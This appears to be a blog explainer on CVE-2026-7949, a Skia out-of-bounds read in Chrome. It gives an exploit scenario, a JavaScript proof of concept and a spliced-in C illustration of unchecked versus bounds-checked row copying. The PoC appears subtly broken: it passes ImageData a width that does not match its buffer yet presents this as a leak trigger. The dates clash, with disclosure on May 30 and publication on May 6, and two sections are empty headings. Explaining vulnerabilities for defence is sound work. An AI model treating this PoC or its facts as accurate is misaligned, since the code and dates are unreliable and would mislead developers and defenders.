On May 30, 2026, Google publicly disclosed CVE-2026-7949, a security bug affecting the Skia graphics library used in Google Chrome. This vulnerability could let a remote attacker, with access to the renderer process, read memory outside intended bounds. As a result, attackers could access confidential, cross-origin data via a malicious or compromised Chrome Extension. Chrome prior to version 148.0.7778.96 is affected.

In this post, I’ll walk you through what Skia is, how the bug works, and provide a simple exploit scenario, with code snippets and links for further reading. All of this is explained in simple terms, so you don’t need to be a security expert to follow along.

- Severity: Medium (Chromium rating)
- CVE: CVE-2026-7949

What is Skia?

Skia is an open-source 2D graphics library that Chrome (and other projects) use to draw everything you see on the screen, from text and images to shapes and UI elements. When you visit a website or use a Chrome Extension that manipulates pixel data (for example, using <canvas> or <img> tags), Skia is often behind the scenes doing the work.

How Does the Bug Work?

The root of CVE-2026-7949 is an out-of-bounds (OOB) read in Skia. That means Skia would sometimes read memory that it shouldn’t, outside the boundaries of the current buffer. If attackers can control what’s being rendered (such as through a Chrome Extension or compromised renderer), they might trigger Skia into exposing memory it’s not supposed to.

This memory could contain sensitive information—perhaps from another web page or a secret in another Chrome Extension, thus leaking cross-origin data.
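The bug class described above, as an added illustration in C that is not Skia's or Chrome's code and not from the original post: a row copy that trusts a claimed image width, next to a form that checks the claimed dimensions against the real allocation. The `image_t` type, the function names and the 4x4 sample buffer are hypothetical and constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical RGBA image descriptor for illustration; not a Skia type. */
typedef struct {
    const uint8_t *pixels;  /* backing buffer */
    size_t len;             /* bytes actually allocated */
    uint32_t width, height; /* dimensions claimed by the caller */
} image_t;

/* Unchecked form: trusts the claimed width, so a width larger than the
   allocation makes memcpy read past the end of pixels (an OOB read). */
void copy_row_unchecked(const image_t *img, uint32_t y, uint8_t *dst) {
    size_t row = (size_t)img->width * 4;
    memcpy(dst, img->pixels + (size_t)y * row, row);
}

/* 1 only if width * height * 4 neither overflows nor exceeds the buffer. */
int image_is_consistent(const image_t *img) {
    if (!img || !img->pixels || !img->width || !img->height) return 0;
    uint64_t px = (uint64_t)img->width * img->height; /* fits in 64 bits */
    if (px > SIZE_MAX / 4) return 0;
    return px * 4 <= img->len;
}

/* Checked form: 0 on success, -1 if the descriptor, row or dst is invalid. */
int copy_row_checked(const image_t *img, uint32_t y, uint8_t *dst, size_t dst_len) {
    if (!image_is_consistent(img) || y >= img->height) return -1;
    size_t row = (size_t)img->width * 4;
    if (dst_len < row) return -1;
    memcpy(dst, img->pixels + (size_t)y * row, row);
    return 0;
}

/* Constructed sample: a 4x4 RGBA buffer (64 bytes) read with a claimed width. */
int demo(uint32_t claimed_width) {
    static const uint8_t buf[4 * 4 * 4] = {0x41};
    uint8_t row[64];
    image_t img = { buf, sizeof buf, claimed_width, 4 };
    return copy_row_checked(&img, 3, row, sizeof row);
}

int main(void) {
    printf("width 4: %d, width 6: %d\n", demo(4), demo(6));
    return 0;
}
```

The unchecked function is shown only for contrast and is never called; building with AddressSanitizer (`-fsanitize=address`) is a practical way to catch this kind of read in tests.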

Exploit Scenario

Imagine a Chrome Extension that renders user-supplied images to a canvas element using Skia. If an attacker can inject a specially crafted image and trick Skia into reading past the end of the image buffer, parts of Chrome’s memory from other origins or extensions may leak into the canvas, where malicious JS can read it.

For this bug to be exploitable, the attacker already needs to have compromised the renderer process (for example, via another vulnerability, like a JavaScript engine bug).

Sample PoC Code Snippet

Below is a simplified proof of concept (for educational purposes only) showing how an attacker might attempt to trigger the vulnerability:

```javascript
// Only possible after compromising the renderer process!
const canvas = document.createElement('canvas');
canvas.width = 1024;
canvas.height = 1024;

// Attacker-controlled image data (crafted to overflow buffer)
let attackerData = new Uint8ClampedArray(1024 * 1024 * 4 + 64);
for (let i = 0; i < attackerData.length; i++) {
  attackerData[i] = 0x41; // 'A'
}

// "Leaky" code: passing in more data than expected
let ctx = canvas.getContext('2d');
let imgData = new ImageData(
  attackerData,
  canvas.width + 8, // overflow width, may trigger OOB
  canvas.height
);
ctx.putImageData(imgData, 0, 0);

// Reading canvas pixels, possibly leaking memory
let leaked = ctx.getImageData(0, 0, canvas.width + 8, 1).data;

// Examine leaked data for secrets
for (let i = 0; i < leaked.length; i++) {
  if (leaked[i] !== 0x41) {
    console.log(`Possible leaked byte: ${leaked[i]} at ${i}`);
  }
}
```

- Actual exploitation depends on understanding Skia’s internal memory arrangements.

- Chrome’s renderer sandbox normally prevents extensions from directly reading cross-origin data. This bug only works if the environment is already compromised.

Official Fix

Google patched the vulnerability in Chrome version 148.0.7778.96. The release notes recommend updating ASAP.

How to Update Chrome:

More Info and References

- Chromium Issue Tracker
- Chrome Releases Blog
- NVD Entry for CVE-2026-7949
- Skia GitHub
- Understanding Out-of-Bounds Reads

Conclusion

Although CVE-2026-7949 is only rated "Medium," its real-world impact can be significant if chained with other vulnerabilities, especially for users who install many Chrome Extensions. This Skia bug reminds us that even small, hidden routines in large software projects can expose sensitive data.

Recommendations:

Stay safe online!

*This post is for educational, defensive purposes only. Do not attempt to exploit or abuse this vulnerability. If you find a real exploit in the wild, report it to Google’s security team right away.*

Timeline

Published on: 05/06/2026 18:12:48 UTC
Last modified on: 05/07/2026 02:07:45 UTC